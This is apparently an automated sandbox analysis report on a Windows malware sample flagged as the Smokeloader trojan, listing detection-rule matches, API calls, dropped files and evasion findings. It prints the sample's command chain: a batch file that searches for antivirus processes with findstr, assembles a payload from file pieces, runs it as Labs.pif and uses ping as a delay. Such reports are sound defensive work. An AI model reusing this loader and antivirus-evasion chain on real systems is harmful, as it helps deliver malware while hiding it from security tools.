Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@24/14@3/2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007DA6AD GetLastError,FormatMessageW,

19_2_007DA6AD

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_004034FC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007C8DE9 AdjustTokenPrivileges,CloseHandle,	19_2_007C8DE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	19_2_007C9399
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007C8DE9 AdjustTokenPrivileges,CloseHandle,	27_2_007C8DE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	27_2_007C9399

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

Code function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404991

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

19_2_007D4148

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

19_2_007D443D

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cyprus

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_03

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

File created: C:\Users\user~1\AppData\Local\Temp\nspD039.tmp

Jump to behavior

Source: lSmb6nDsrC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lSmb6nDsrC.exe	Virustotal: Detection: 68%
Source: lSmb6nDsrC.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

File read: C:\Users\user\Desktop\lSmb6nDsrC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lSmb6nDsrC.exe "C:\Users\user\Desktop\lSmb6nDsrC.exe"
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 55116385
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SlutSteLouisTranslation" Cyprus
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Breeding + Fuji + Weather 55116385\s
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 55116385\Labs.pif 55116385\s
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 55116385	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SlutSteLouisTranslation" Cyprus	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Breeding + Fuji + Weather 55116385\s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 55116385\Labs.pif 55116385\s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Jump to behavior

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: lSmb6nDsrC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007EC6D9 LoadLibraryA,GetProcAddress,

19_2_007EC6D9

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00798B75 push ecx; ret	19_2_00798B88
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_004032AC push eax; ret	27_2_004032C2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00798B75 push ecx; ret	27_2_00798B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	19_2_007F59B3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00785EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	19_2_00785EDA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	27_2_007F59B3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00785EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	27_2_00785EDA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007933B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_007933B7

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	API/Special instruction interceptor: Address: 7FFB2CECE814
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	API/Special instruction interceptor: Address: 7FFB2CECD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Labs.pif, 0000001B.00000002.2327887079.00000000012CB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOKW

Uses ping.exe to sleep

